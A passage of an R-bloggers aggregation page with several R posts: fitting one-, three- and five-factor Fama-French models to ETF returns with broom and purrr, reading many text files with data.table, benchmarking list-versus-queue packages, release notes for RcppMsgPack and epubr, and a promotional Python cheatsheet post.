##  sessioninfo             1.0.0   2017-06-21 CRAN (R 3.5.1)
##  stringi                 1.2.4   2018-07-20 cran (@1.2.4)
##  stringr                 1.3.1   2018-05-10 CRAN (R 3.5.0)
##  WikidataQueryServiceR * 0.1.1   2017-04-28 CRAN (R 3.5.1)
##  withr                   2.1.2   2018-03-15 CRAN (R 3.5.0)
##  xfun                    0.3     2018-07-06 CRAN (R 3.5.1)
##  yaml                    2.2.0   2018-07-25 CRAN (R 3.5.1)


Many Factor Models

Mon, 11/19/2018 - 01:00

(This article was first published on R Views, and kindly contributed to R-bloggers)

Today, we will return to the Fama French (FF) model of asset returns and use it as a proxy for fitting and evaluating multiple linear models. In a previous post, we reviewed how to run the FF three-factor model on the returns of a portfolio. That is, we ran one model on one set of returns. Today, we will run multiple models on multiple streams of returns, which will allow us to compare those models and hopefully build a code scaffolding that can be used when we wish to explore other factor models.

Let’s get to it!

We will start by importing daily prices and calculating the returns of our five usual ETFs: SPY, EFA, IJS, EEM and AGG. I covered the logic for this task in a previous post and the code is below.

library(tidyverse)
library(broom)
library(tidyquant)
library(timetk)

symbols <- c("SPY", "EFA", "IJS", "EEM", "AGG")

# The prices object will hold our daily price data.
prices <-
  getSymbols(symbols, src = 'yahoo', from = "2012-12-31", to = "2017-12-31",
             auto.assign = TRUE, warnings = FALSE) %>%
  map(~Ad(get(.))) %>%
  reduce(merge) %>%
  `colnames<-`(symbols)

asset_returns_long <-
  prices %>%
  tk_tbl(preserve_index = TRUE, rename_index = "date") %>%
  gather(asset, returns, -date) %>%
  group_by(asset) %>%
  mutate(returns = (log(returns) - log(lag(returns)))) %>%
  na.omit()

asset_returns_long %>% head()

# A tibble: 6 x 3
# Groups:   asset [1]
  date       asset returns
1 2013-01-02 SPY    0.0253
2 2013-01-03 SPY   -0.00226
3 2013-01-04 SPY    0.00438
4 2013-01-07 SPY   -0.00274
5 2013-01-08 SPY   -0.00288
6 2013-01-09 SPY    0.00254

We now have the returns of our five ETFs saved in a tidy tibble called asset_returns_long. Normally we would combine these into one portfolio, but we will leave them as individual assets today so we can explore how to model the returns of multiple assets saved in one data object.

We are going to model those individual assets on the Fama French set of five factors to see if those factors explain our asset returns. Those five factors are the market returns (similar to CAPM), firm size (small versus big), firm value (high versus low book-to-market), firm profitability (high versus low operating profits), and firm investment (high versus low total asset growth). To learn more about the theory behind using these factors, see this article.

Our next step is to import our factor data, and luckily FF make them available on their website. I presented the code showing how to import this data in a previous post on my blog so I won’t go through the steps again, but the code is below.

factors_data_address <-
  "http://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp/Global_5_Factors_Daily_CSV.zip"

factors_csv_name <- "Global_5_Factors_Daily.csv"

temp <- tempfile()

download.file(
  # location of file to be downloaded
  factors_data_address,
  # where we want R to store that file
  temp,
  quiet = TRUE)

Global_5_Factors <-
  read_csv(unz(temp, factors_csv_name), skip = 6) %>%
  rename(date = X1, MKT = `Mkt-RF`) %>%
  mutate(date = ymd(parse_date_time(date, "%Y%m%d"))) %>%
  mutate_if(is.numeric, funs(. / 100)) %>%
  select(-RF)

Global_5_Factors %>% head()

# A tibble: 6 x 6
  date           MKT       SMB     HML     RMW       CMA
1 1990-07-02  0.00700 -0.000600 -0.0031  0.0022  0.0004
2 1990-07-03  0.0018   0.0008   -0.0017  0.0007  0.0004
3 1990-07-04  0.0063  -0.0019   -0.0016 -0.0007  0.000300
4 1990-07-05 -0.0074   0.0031    0.0017 -0.0013  0.000600
5 1990-07-06  0.002   -0.0015    0.0002  0.002  -0.000300
6 1990-07-09  0.00240  0.0018    0.0001  0.0004 -0.00240

Next, we mash asset_returns_long and Global_5_Factors into one data object, using left_join(..., by = "date") because each object has a column called date.

data_joined_tidy <-
  asset_returns_long %>%
  left_join(Global_5_Factors, by = "date") %>%
  na.omit()

data_joined_tidy %>% head(5)

# A tibble: 5 x 8
# Groups:   asset [1]
  date       asset  returns     MKT     SMB      HML      RMW     CMA
1 2013-01-02 SPY    0.0253   0.0199 -0.0043  0.0028   -0.0028 -0.0023
2 2013-01-03 SPY   -0.00226 -0.0021  0.00120 0.000600  0.0008  0.0013
3 2013-01-04 SPY    0.00438  0.0064  0.0011  0.0056   -0.0043  0.0036
4 2013-01-07 SPY   -0.00274 -0.0014  0.00580 0        -0.0015  0.0001
5 2013-01-08 SPY   -0.00288 -0.0027  0.0018  -0.00120 -0.0002  0.00120

We now have a tibble called data_joined_tidy with the asset names in the asset column, asset returns in the returns column, and our five FF factors in the MKT, SMB, HML, RMW and CMA columns. We want to explore whether there is a linear relationship between the returns of our five assets and any/all of the five FF factors. Specifically, we will run several linear regressions, save the results, examine the results, and then quickly visualize the results.

The broom and purrr packages will do a lot of the heavy lifting for us eventually, but let’s start with a simple example: regress the return of one ETF on one of the FF factors. We will use do() for this, which I believe has been declared not a best practice but it’s so irresistibly simple to plunk into the pipes.

data_joined_tidy %>%
  filter(asset == "SPY") %>%
  do(model = lm(returns ~ MKT, data = .))

Source: local data frame [1 x 2]
Groups:
# A tibble: 1 x 2
  asset model
*
1 SPY

That worked, but our model is stored as a nested S3 object. Let’s use tidy(), glance(), and augment() to view the results.

data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% tidy(model) # A tibble: 2 x 6 # Groups: asset [1] asset term estimate std.error statistic p.value 1 SPY (Intercept) 0.000126 0.000100 1.26 0.208 2 SPY MKT 1.02 0.0154 66.0 0 data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% glance(model) # A tibble: 1 x 12 # Groups: asset [1] asset r.squared adj.r.squared sigma statistic p.value df logLik 1 SPY 0.776 0.776 0.00354 4356. 0 2 5319. # ... with 4 more variables: AIC , BIC , deviance , # df.residual data_joined_tidy %>% filter(asset == "SPY") %>% do(model = lm(returns ~ MKT, data = .)) %>% augment(model) %>% head(5) # A tibble: 5 x 10 # Groups: asset [1] asset returns MKT .fitted .se.fit .resid .hat .sigma .cooksd 1 SPY 0.0253 0.0199 0.0204 3.17e-4 4.90e-3 7.99e-3 0.00354 7.77e-3 2 SPY -0.00226 -0.0021 -0.00201 1.07e-4 -2.47e-4 9.17e-4 0.00354 2.24e-6 3 SPY 0.00438 0.0064 0.00665 1.36e-4 -2.27e-3 1.47e-3 0.00354 3.02e-4 4 SPY -0.00274 -0.0014 -0.00130 1.04e-4 -1.44e-3 8.59e-4 0.00354 7.07e-5 5 SPY -0.00288 -0.0027 -0.00263 1.11e-4 -2.56e-4 9.82e-4 0.00354 2.56e-6 # ... with 1 more variable: .std.resid

We can quickly pop our augmented results into ggplot() and inspect our residuals versus our fitted values. The important takeaway here is that our augmented results are in a data frame, so we can use all of our ggplot() code flows to create visualizations.

data_joined_tidy %>%
  filter(asset == "SPY") %>%
  do(model = lm(returns ~ MKT, data = .)) %>%
  augment(model) %>%
  ggplot(aes(y = .resid, x = .fitted)) +
  geom_point(color = "cornflowerblue")

Alright, we have run a simple linear regression and seen how tidy(), glance(), and augment() clean up the model results. We could, of course, keep repeating this process for any combination of the FF factors and any of our ETFs, but let’s look at a more efficient approach for fitting multiple models on all of our ETFs.

First, let’s create and save three models as functions. That will allow us to pass them to the map functions from purrr. We will save a one-factor model as a function called model_one, a three-factor model as a function called model_two and a five-factor model as a function called model_three. Note that each function takes a data frame as an argument.

model_one <- function(df) {
  lm(returns ~ MKT, data = df)
}

model_two <- function(df) {
  lm(returns ~ MKT + SMB + HML, data = df)
}

model_three <- function(df) {
  lm(returns ~ MKT + SMB + HML + RMW + CMA, data = df)
}

Now we want to run those three models on each of our five asset returns or, equivalently, we need to pass in a data frame of asset returns to each of those functions. However, we don’t want to save our five ETF returns as five separate tibbles. That would get quite unwieldy with a larger set of ETFs.

Instead, let’s use nest() to make our data more compact!

data_joined_tidy %>%
  group_by(asset) %>%
  nest()

# A tibble: 5 x 2
  asset data
1 SPY
2 EFA
3 IJS
4 EEM
5 AGG

In my mind, our task has gotten a little conceptually simpler: we want to apply each of our models to each tibble in the data column, and to do that, we need to pass each tibble in that column to our functions.

Let’s use a combination of mutate() and map().

data_joined_tidy %>%
  group_by(asset) %>%
  nest() %>%
  mutate(one_factor_model   = map(data, model_one),
         three_factor_model = map(data, model_two),
         five_factor_model  = map(data, model_three))

# A tibble: 5 x 5
  asset data  one_factor_model three_factor_mod… five_factor_mod…
1 SPY
2 EFA
3 IJS
4 EEM
5 AGG

From a substantive perspective, we’re done! We have run all three models on all five assets and stored the results. Of course, we’d like to be able to look at the results, but the substance is all there.

Just as we did above, we will use tidy(), glance(), and augment(), but now in combination with mutate() and map() to clean up the model results stored in each column. Let’s start by running just model_one and then tidying the results.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy)) # A tibble: 5 x 4 asset data one_factor_model tidied_one 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG

If we want to see those tidied results, we need to unnest() them.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy)) %>% unnest(tidied_one) # A tibble: 10 x 6 asset term estimate std.error statistic p.value 1 SPY (Intercept) 0.000126 0.000100 1.26 2.08e- 1 2 SPY MKT 1.02 0.0154 66.0 0. 3 EFA (Intercept) -0.000288 0.0000972 -2.97 3.07e- 3 4 EFA MKT 1.29 0.0150 86.0 0. 5 IJS (Intercept) 0.0000634 0.000171 0.371 7.11e- 1 6 IJS MKT 1.13 0.0264 42.9 3.25e-248 7 EEM (Intercept) -0.000491 0.000203 -2.42 1.57e- 2 8 EEM MKT 1.40 0.0313 44.8 4.94e-263 9 AGG (Intercept) 0.0000888 0.0000572 1.55 1.21e- 1 10 AGG MKT -0.0282 0.00883 -3.19 1.46e- 3

Let’s use glance() and augment() as well.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) # A tibble: 5 x 6 asset data one_factor_model tidied_one glanced_one augmented_one 1 SPY

Again, we use unnest() if we wish to look at the glanced or augmented results.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) %>% # unnest(tidied_one) unnest(glanced_one) # A tibble: 5 x 16 asset data one_factor_model tidied_one augmented_one r.squared 1 SPY , sigma , # statistic , p.value , df , logLik , AIC , # BIC , deviance , df.residual # unnest(augmented_one) data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), tidied_one = map(one_factor_model, tidy), glanced_one = map(one_factor_model, glance), augmented_one = map(one_factor_model, augment)) %>% # unnest(tidied_one) # unnest(glanced_one) unnest(augmented_one) %>% head(5) # A tibble: 5 x 10 asset returns MKT .fitted .se.fit .resid .hat .sigma .cooksd 1 SPY 0.0253 0.0199 0.0204 3.17e-4 4.90e-3 7.99e-3 0.00354 7.77e-3 2 SPY -0.00226 -0.0021 -0.00201 1.07e-4 -2.47e-4 9.17e-4 0.00354 2.24e-6 3 SPY 0.00438 0.0064 0.00665 1.36e-4 -2.27e-3 1.47e-3 0.00354 3.02e-4 4 SPY -0.00274 -0.0014 -0.00130 1.04e-4 -1.44e-3 8.59e-4 0.00354 7.07e-5 5 SPY -0.00288 -0.0027 -0.00263 1.11e-4 -2.56e-4 9.82e-4 0.00354 2.56e-6 # ... with 1 more variable: .std.resid

Let’s change gears a bit and evaluate how well each model explained one of our asset returns, IJS, based on adjusted R-squareds.

First, we use filter(asset == "IJS"), nest the data, then map() each of our models to the nested data. I don’t want the raw data anymore, so will remove it with select(-data).

data_joined_tidy %>% group_by(asset) %>% filter(asset == "IJS") %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) %>% select(-data) # A tibble: 1 x 4 asset one_factor_model three_factor_model five_factor_model 1 IJS

We now have our three model results for the returns of IJS. Let’s use gather() to put those results in tidy format, and then glance() to get at the adjusted R-squared, AIC, and BIC.

models_results <-
  data_joined_tidy %>%
  group_by(asset) %>%
  filter(asset == "IJS") %>%
  nest() %>%
  mutate(one_factor_model   = map(data, model_one),
         three_factor_model = map(data, model_two),
         five_factor_model  = map(data, model_three)) %>%
  select(-data) %>%
  gather(models, results, -asset) %>%
  mutate(glanced_results = map(results, glance)) %>%
  unnest(glanced_results) %>%
  select(asset, models, adj.r.squared, AIC, BIC)

models_results

# A tibble: 3 x 5
  asset models             adj.r.squared    AIC    BIC
1 IJS   one_factor_model           0.594 -9282. -9266.
2 IJS   three_factor_model         0.599 -9298. -9272.
3 IJS   five_factor_model          0.637 -9421. -9385.

Let’s plot these results and quickly glance at where the adjusted R-squareds lie. We will call ggplot(aes(x = models, y = adj.r.squared, color = models)) and then geom_point().

models_results %>%
  ggplot(aes(x = models, y = adj.r.squared, color = models)) +
  geom_point() +
  labs(x = "", title = "Models Comparison") +
  theme(plot.title = element_text(hjust = 0.5))

That chart looks alright, but the models are placed on the x-axis in alphabetical order, whereas I’d prefer they go in ascending order based on adjusted R-squared. We can make that happen with ggplot(aes(x = reorder(models, adj.r.squared)...). Let’s also add labels on the chart with geom_text(aes(label = models), nudge_y = .003). Since we’re labeling in the chart, we can remove the x-axis labels with theme(axis.text.x = element_blank()).

models_results %>%
  ggplot(aes(x = reorder(models, adj.r.squared), y = adj.r.squared, color = models)) +
  geom_point(show.legend = NA) +
  geom_text(aes(label = models), nudge_y = .003) +
  labs(x = "", title = "Models Comparison") +
  theme(plot.title = element_text(hjust = 0.5),
        axis.text.x = element_blank(),
        axis.ticks.x = element_blank())

Pay close attention to the scale on the y-axis. The lowest adjusted R-squared is less than .05 away from the highest. Maybe that amount is meaningful in your world, and maybe it isn’t.

Before we close, let’s get back to modeling and saving results. Here is the full code for running each model on each asset, then tidying, glancing, and augmenting those results. The result is a compact, nested tibble where the columns can be unnested depending on which results we wish to extract.

data_joined_tidy %>% group_by(asset) %>% nest() %>% mutate(one_factor_model = map(data, model_one), three_factor_model = map(data, model_two), five_factor_model = map(data, model_three)) %>% mutate(tidied_one = map(one_factor_model, tidy), tidied_three = map(three_factor_model, tidy), tidied_five = map(five_factor_model, tidy)) %>% mutate(glanced_one = map(one_factor_model, glance), glanced_three = map(three_factor_model, glance), glanced_five = map(five_factor_model, glance)) %>% mutate(augmented_one = map(one_factor_model, augment), augmented_three = map(three_factor_model, augment), augmented_five = map(five_factor_model, augment)) # %>% # A tibble: 5 x 14 asset data one_factor_model three_factor_mod… five_factor_mod… 1 SPY 2 EFA 3 IJS 4 EEM 5 AGG # ... with 9 more variables: tidied_one , tidied_three , # tidied_five , glanced_one , glanced_three , # glanced_five , augmented_one , augmented_three , # augmented_five # unnest any broomed column for viewing # unnest(Insert nested column name here)

There are probably more efficient ways to do this, and in the future we’ll explore a package that runs these model comparisons for us, but for now, think about how we could wrap this work to a Shiny application or extend this code flow to accommodate more models and more assets.

Thanks for reading and see you next time!

_____='https://rviews.rstudio.com/2018/11/19/many-factor-models/';


RcppMsgPack 0.2.3

Sun, 11/18/2018 - 23:32

(This article was first published on Thinking inside the box , and kindly contributed to R-bloggers)

Another maintenance release of RcppMsgPack got onto CRAN today. Two new helper functions were added and, not unlike the previous 0.2.2 release, some additional changes are internal and should allow compilation on all CRAN systems.

MessagePack itself is an efficient binary serialization format. It lets you exchange data among multiple languages like JSON. But it is faster and smaller. Small integers are encoded into a single byte, and typical short strings require only one extra byte in addition to the strings themselves. RcppMsgPack brings both the C++ headers of MessagePack and the clever code (in both R and C++) Travers wrote to access MsgPack-encoded objects directly from R.
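As a rough illustration of that round trip (assuming the msgpack_pack()/msgpack_unpack() helpers behave as described in the package documentation; this example is not taken from the release notes):

library(RcppMsgPack)

# serialize a small R object to MessagePack bytes, then decode it again
raw_bytes <- msgpack_pack(list("a", 1L, c(TRUE, FALSE)))
msgpack_unpack(raw_bytes)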

Changes in version 0.2.3 (2018-11-18)
  • New functions msgpack_read and msgpack_write for efficient direct access to MessagePackage content from files (#13).

  • Several internal code polishes to smooth compilation (#14 and #15).

Courtesy of CRANberries, there is also a diffstat report for this release.

More information is on the RcppMsgPack page. Issues and bug reports should go to the GitHub issue tracker.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.


Statistics Sunday: Reading and Creating a Data Frame with Multiple Text Files

Sun, 11/18/2018 - 19:23

(This article was first published on Deeply Trivial, and kindly contributed to R-bloggers)

First Statistics Sunday in far too long! It’s going to be a short one, but it describes a great trick I learned recently while completing a time study for our exams at work.

To give a bit of background, this time study involves analyzing the time examinees spent on their exam and whether they were able to complete all items. We’ve done time studies in the past to select the time allowed for each exam, but we revisit on a cycle to make certain the time allowed is still ample. All of our exams are computer-administered, and we receive daily downloads from our exam provider with data on all exams administered that day.

What that means is, to study a year’s worth of exam data, I need to read in and analyze 365(ish – test centers are generally closed for holidays) text files. Fortunately, I found code that would read all files in a particular folder and bind them into a single data frame. First, I’ll set the working directory to the location of those files, and create a list of all files in that directory:

setwd("Q:/ExamData/2018")
filelist <- list.files()

For the next part, I’ll need the data.table library, which you’ll want to install if you don’t already have it:

library(data.table)
Exams2018 <- rbindlist(sapply(filelist, fread, simplify = FALSE),
                       use.names = TRUE, idcol = "FileName")

Now I have a data frame with all exam data from 2018, and an additional column that identifies which file a particular case came from.

What if your working directory has more files than you want to read? You can still use this code, with some updates. For instance, if you want only the text files from the working directory, you could add a regular expression to the list.files() code to only look for files with “.txt” extension:

list.files(pattern = "\\.txt$")

If you’re only working with a handful of files, you can also manually create the list to be used in the rbindlist function. Like this:

filelist <- c("file1.txt", "file2.txt", "file3.txt")

That’s all for now! Hope everyone has a Happy Thanksgiving!


Ultimate Python Cheatsheet: Data Science Workflow with Python

Sun, 11/18/2018 - 09:01

(This article was first published on business-science.io - Articles, and kindly contributed to R-bloggers)

At Business Science, we are developing a revolutionary system for teaching Business Analysis with Python (Business Analysis with Python is a new course we are developing at Business Science University).

The system is revolutionary for a number of reasons (we’ll get to these in a minute). The cornerstone of our teaching process is the Data Science with Python Workflow, which is an adaptation of the Data Science with R workflow originally taught by Hadley Wickham and Garrett Grolemund in the excellent book, R For Data Science. The NEW Python Cheatsheet links the documentation, cheatsheets, and key resources available for the most widely used Python packages into one meta-cheatsheet that illustrates the workflow.


Get The ULTIMATE Python Cheatsheet

Just go to our website, and you’ll see it available under the “Resources” Tab. The NEW Python Cheatsheet with the Data Science Workflow in Python is available for download here.

Download the ULTIMATE Python Cheatsheet

Get All Cheatsheets

Like our cheatsheets? Get them all!

You Need To Learn Data Science For Business with R!



Available Now!

To be efficient as a data scientist, you need to learn R. Take the course that has cut data science projects in half (see this testimonial from a leading data science consultant) and has progressed data scientists more than anything they have tried before. Over 10 weeks you learn what it has taken data scientists 10 years to learn:

  • Our systematic data science for business framework
  • R and H2O for Machine Learning
  • How to produce Return-On-Investment from data science
  • And much more.

Start Learning Today!

How To Use The Cheatsheet

The ULTIMATE Python Cheatsheet is an amazing reference. It contains the primary resources you need for getting up and running with Python for Data Science. Let’s take a look.

The Workflow

The first thing you will notice is the workflow that is prominently presented. You can see where the various Python Packages are used.

Python At Each Workflow Step

Links To Documentation

Here’s the beauty of the ULTIMATE Python Cheatsheet. With one click, you can easily get to the web documentation for any of the Python packages.

One-Click To Python Documentation


Links To Key Resources

We didn’t stop at documentation and cheatsheets. We also added in important references to get you up to speed quickly.

One-Click To Important References


Learning Python For Business

Are you interested in learning Python For Business? Then look no further.

  • Business Science University has the most advanced, technology intensive, and streamlined data science educational system for business on the planet.

  • We are developing an INTRODUCTORY BUSINESS ANALYSIS COURSE WITH PYTHON (DS4B 101-P) that delivers an amazing educational experience for learners who want to apply Python to business analysis.

Course Launch Date

To be determined – We are hopeful for December 2018 / January 2019. Sign up at university.business-science.io to get the course launch details once they are available.

Why Choose Business Science for Education?
  • Research: We know how to learn data science efficiently and what ingredients create high performance data science teams.

  • Business Application over Tools: We don’t teach tools. We teach how to solve business problems using tools. There is a key difference. Our approach builds knowledge you can apply immediately.

  • Learn In Weeks What Takes Years: When you take a Business Science University course, you learn everything needed to solve the business project. You learn from proven frameworks and workflows. We cut out anything that you don’t need to know. This makes our programs the most efficient programs for learning.

Learn Data Science For Business with R Today!



Available Now!

To be efficient as a data scientist, you need to learn R. Take the course that has cut data science projects in half (see this testimonial from a leading data science consultant) and has progressed data scientists more than anything they have tried before. Over 10 weeks you learn what it has taken data scientists 10 years to learn:

  • Our systematic data science for business framework
  • R and H2O for Machine Learning
  • How to produce Return-On-Investment from data science
  • And much more.

Start Learning Today!


Growing List vs Growing Queue

Sun, 11/18/2018 - 06:54

(This article was first published on S+/R – Yet Another Blog in Statistical Computing, and kindly contributed to R-bloggers)

### GROWING LIST ###
base_lst1 <- function(df) {
  l <- list()
  for (i in seq(nrow(df))) l[[i]] <- as.list(df[i, ])
  return(l)
}

### PRE-ALLOCATING LIST ###
base_lst2 <- function(df) {
  l <- vector(mode = "list", length = nrow(df))
  for (i in seq(nrow(df))) l[[i]] <- as.list(df[i, ])
  return(l)
}

### DEQUER PACKAGE ###
dequer_queue <- function(df) {
  q <- dequer::queue()
  for (i in seq(nrow(df))) dequer::pushback(q, as.list(df[i, ]))
  return(as.list(q))
}

### LIQUEUER PACKAGE ###
liqueuer_queue <- function(df) {
  q <- liqueueR::Queue$new()
  for (i in seq(nrow(df))) q$push(as.list(df[i, ]))
  return(q$data)
}

### COLLECTIONS PACKAGE ###
collections_queue <- function(df) {
  q <- collections::Queue$new()
  for (i in seq(nrow(df))) q$push(as.list(df[i, ]))
  return(q$as_list())
}

### RSTACKDEQUE PACKAGE ###
rstackdeque_queue <- function(df) {
  q <- rstackdeque::rpqueue()
  for (i in seq(nrow(df))) q <- rstackdeque::insert_back(q, as.list(df[i, ]))
  return(as.list(q))
}

nyc <- read.csv("Downloads/nycflights.csv")

compare <- function(ds) {
  tests <- c("dequer_queue(ds)", "base_lst2(ds)", "liqueuer_queue(ds)",
             "collections_queue(ds)", "rstackdeque_queue(ds)")
  for (t in tests) print(identical(base_lst1(ds), eval(parse(text = t))))
}

compare(nyc[1:10, ])
#[1] TRUE
#[1] TRUE
#[1] TRUE
#[1] TRUE
#[1] TRUE

### BENCHMARKS ###
bm <- function(ds) {
  rbenchmark::benchmark(replications = 5, order = "elapsed", relative = "elapsed",
                        columns = c("test", "replications", "elapsed", "relative"),
    "GROWING LIST"         = base_lst1(ds),
    "PRE-ALLOCATING LIST"  = base_lst2(ds),
    "DEQUER::QUEUE"        = dequer_queue(ds),
    "LIQUEUER::QUEUE"      = liqueuer_queue(ds),
    "COLLECTIONS::QUEUE"   = collections_queue(ds),
    "RSTACKDEQUE::RPQUEUE" = rstackdeque_queue(ds)
  )
}

bm(nyc[1:1000, ])
#                  test replications elapsed relative
#1         GROWING LIST            5   0.808    1.000
#2  PRE-ALLOCATING LIST            5   0.839    1.038
#5   COLLECTIONS::QUEUE            5   0.842    1.042
#4      LIQUEUER::QUEUE            5   1.091    1.350
#3        DEQUER::QUEUE            5   1.375    1.702
#6 RSTACKDEQUE::RPQUEUE            5   1.901    2.353

bm(nyc[1:10000, ])
#                  test replications elapsed relative
#5   COLLECTIONS::QUEUE            5   8.175    1.000
#1         GROWING LIST            5   8.505    1.040
#2  PRE-ALLOCATING LIST            5  12.554    1.536
#4      LIQUEUER::QUEUE            5  17.325    2.119
#6 RSTACKDEQUE::RPQUEUE            5  21.785    2.665
#3        DEQUER::QUEUE            5  22.030    2.695

bm(nyc[1:20000, ])
#                  test replications elapsed relative
#5   COLLECTIONS::QUEUE            5  16.730    1.000
#2  PRE-ALLOCATING LIST            5  17.134    1.024
#1         GROWING LIST            5  17.342    1.037
#4      LIQUEUER::QUEUE            5  48.359    2.891
#6 RSTACKDEQUE::RPQUEUE            5  52.420    3.133
#3        DEQUER::QUEUE            5  79.938    4.778

bm(nyc[1:30000, ])
#                  test replications elapsed relative
#2  PRE-ALLOCATING LIST            5  24.600    1.000
#5   COLLECTIONS::QUEUE            5  24.797    1.008
#1         GROWING LIST            5  25.600    1.041
#6 RSTACKDEQUE::RPQUEUE            5  60.908    2.476
#4      LIQUEUER::QUEUE            5 102.482    4.166
#3        DEQUER::QUEUE            5 182.039    7.400


epubr 0.5.0 CRAN release

Sun, 11/18/2018 - 01:00

(This article was first published on Matt's R Blog, and kindly contributed to R-bloggers)

The epubr package provides functions supporting the reading and parsing of internal e-book content from EPUB files. This post briefly highlights the changes from v0.4.0. See the vignette for a more comprehensive introduction.

Minor addition

There is not much to see with the upgrade to version 0.5.0. Only one user function has been added, epub_cat. All this does is allow you to cat chunks of parsed e-book text to the console in a more readable manner. This can be helpful to get a quick glimpse of the content you are working with in a way that is easier on the eyes than looking at table entries and object structures.

Arguments to epub_cat give you control over the formatting. It is not intended to serve any other purposes beyond this human-guided content inspection. Arguments include:

  • max_paragraphs
  • skip
  • paragraph_spacing
  • paragraph_indent
  • section_sep
  • book_sep

See the help documentation for details.
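For example, a call along the following lines prints a couple of paragraphs from the EPUB file bundled with the package (the argument values are arbitrary and their exact semantics are described in ?epub_cat):

library(epubr)
file <- system.file("dracula.epub", package = "epubr")
epub_cat(file, max_paragraphs = 2, skip = 10,
         paragraph_spacing = 1, paragraph_indent = 4)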

Minor change

epub_cat, and now epub_head for consistency, take a more generic-sounding first argument x as a data argument, rather than data or file. This is because these summary functions can now be used on a filename string pointing to an external EPUB file that does not otherwise need to be read into R or, alternatively, a data frame already read into R by epub. This allows you to avoid reading the files from disk multiple times if the data is already in your R session.

Some context around epub_cat

Also, notice that this operates on paragraphs, not lines (if by lines you mean sentences). Since this level of information has not been stripped from the text that has been read in, it can be used. This may not mean the same thing in every section of every e-book, but the general idea is that epub_cat respects line breaks in the text. It pays attention to where they are and where they are not. I chose to call these paragraphs; it’s the label that is by far most often the correct one. But a one-line title or even the distinct lines of text on the copyright page of an e-book would all be treated the same way.

Control ends there of course. For example, you cannot stipulate that a title line should be excluded from indenting. Remember that the purpose of epubr is to bring in text for analysis, while preserving much (but not all) of its structure. I.e., you want “only the text” to operate on with ease, but you also don’t want to be relegated to a single, gigantic character string (that may not even be in the correct order) that aggregates out potential variables that could be mapped to sections of text and their sequence. epubr is not intended to retain all the XML tags that define the appearance of the original document. The fundamental purpose of epubr is to strip that out entirely.

Here is an example:

library(epubr)
file <- system.file("dracula.epub", package = "epubr")
(x <- epub(file))
#> # A tibble: 1 x 9
#>   rights  identifier   creator  title language subject date  source  data
#> 1 Public~ http://www.~ Bram St~ Drac~ en       Horror~ 1995~ http:/~
#> # A tibble: 15 x 4
#>    section       text                                          nword nchar
#>  1 item6         "The Project Gutenberg EBook of Dracula, by ~ 11252 60972
#>  2 item7         "But I am not in heart to describe beauty, f~ 13740 71798
#>  3 item8         "\" 'Lucy, you are an honest-hearted girl, I~ 12356 65522
#>  4 item9         "CHAPTER VIIIMINA MURRAY'S JOURNAL\nSame day~ 12042 62724
#>  5 item10        "CHAPTER X\nLetter, Dr. Seward to Hon. Arthu~ 12599 66678
#>  6 item11        "Once again we went through that ghastly ope~ 11919 62949
#>  7 item12        "CHAPTER XIVMINA HARKER'S JOURNAL\n23 Septem~ 12003 62234
#>  8 item13        "CHAPTER XVIDR. SEWARD'S DIARY-continued\nIT~ 13812 72903
#>  9 item14        "\"Thus when we find the habitation of this ~ 13201 69779
#> 10 item15        "\"I see,\" I said. \"You want big things th~ 12706 66921
#> 11 item16        "CHAPTER XXIIIDR. SEWARD'S DIARY\n3 October.~ 11818 61550
#> 12 item17        "CHAPTER XXVDR. SEWARD'S DIARY\n11 October, ~ 12989 68564
#> 13 item18        " \nLater.-Dr. Van Helsing has returned. He ~  8356 43464
#> 14 item19        "End of the Project Gutenberg EBook of Dracu~  2669 18541
#> 15 coverpage-wr~ ""                                                 0     0

epub_cat(x, max_paragraphs = 3, skip = 100)
#> CHAPTER IJONATHAN HARKER'S JOURNAL
#>
#> (Kept in shorthand.)
#>
#> 3 May. Bistritz.-Left Munich at 8:35 P. M., on 1st May, arriving at Vienna early next morning; should have arrived at 6:46, but train was an hour late. Buda-Pesth seems a wonderful place, from the glimpse which I got of it from the train and the little I could walk through the streets. I feared to go very far from the station, as we had arrived late and would start as near the correct time as possible. The impression I had was that we were leaving the West and entering the East; the most western of splendid bridges over the Danube, which is here of noble width and depth, took us among the traditions of Turkish rule.

I suppose this function could be useful for cat-ing text externally to another display or document for some use case other than just quick inspection at the console. If so, I would love to hear what that purpose is so that I might be able to improve epub_cat or add some other functionality entirely. But in general I would consider this a tangential function in epubr. There are bigger fish to fry.

Encoding

The main change was my decision to no longer rely on native encoding (getOption("encoding")) when reading EPUB files. In my ignorance I thought there was no reason to fuss with this. However, I began noticing issues with improper character parsing, resulting in weird characters showing up in some places. My initial thought was to substitute these odd strings of characters for what they were supposed to represent, e.g., an apostrophe, and it did seem like a fairly contained problem, which is why I didn’t notice it sooner and no one else made any mention of it either. But this idea was missing the bigger picture (and it didn’t work well anyway).

I did some poking around and learned that while EPUB titles from various publishers can give the impression that EPUB formatting is the Wild West, there is apparently some standardization, at least in terms of encoding: EPUB files have UTF encoding in common, UTF-8 in most cases but possibly UTF-16.

This led me to add an explicit encoding argument to epub, defaulting to UTF-8. The user can still change it, though typically there should be no reason to do so, except possibly to switch to UTF-16, and I have no idea how common that even is.
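
For reference, here is a minimal usage sketch based on the description above (UTF-8 is already the default, so passing it explicitly is purely illustrative; the bundled Dracula EPUB is the same example file used earlier):

library(epubr)
file <- system.file("dracula.epub", package = "epubr")
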